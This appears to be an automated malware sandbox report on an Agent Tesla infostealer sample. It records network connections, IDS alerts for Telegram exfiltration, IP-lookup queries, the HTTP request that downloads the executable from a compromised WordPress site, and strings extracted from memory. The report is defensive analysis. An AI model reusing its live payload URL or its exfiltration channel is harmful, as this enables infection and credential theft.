Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49725 -> 149.154.167.220:443
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49728 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

May check the online IP address of the machine

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pzsrblog.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXrN.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pzsrblog.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP

Source: Joe Sandbox View

IP Address: 64.185.227.156 64.185.227.156

Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: msdt.exe, 00000004.00000002.444523521.0000000002F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.499260856.0000000005C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://en.w-
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: PROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 059BE406-184C-47DB-8766-13F9D87050E0.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.497239392.0000000005C43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com.
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.546642632.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.514679156.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507511308.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.514603755.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers(
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.503862428.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/N
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.505106593.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505144546.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505189322.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlN
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504649154.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersF
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504582264.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersP
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504649154.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersS
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.505144546.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505189322.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersTP
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.503997791.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersg
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.507155731.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersn
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.503961397.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersp
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.508657318.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com6=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comalic
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.508657318.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comalsF
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comd$=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504476580.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comedta
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504476580.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.505879437.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comj=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.506521208.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comlicY=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.546642632.0000000005C10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.505879437.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comm/
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comrsiv
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496449471.0000000005C42000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496074815.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496494097.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496292759.0000000005C42000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496697085.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496527277.0000000005C43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496292759.0000000005C42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/H
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496074815.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cna-er
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.510497541.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510115416.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.509829844.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509981461.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509871998.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510314930.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510347822.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.509783839.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.510270514.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm;
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.510115416.0000000005C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/w=
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.502412410.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/A=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/e=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/j=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/e=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.502412410.0000000005C23000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/w=
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.510020800.0000000005C12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.monotype.
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.504305788.0000000005C5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.monotype.s
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.K%
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comf(
Source: PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.comnP(
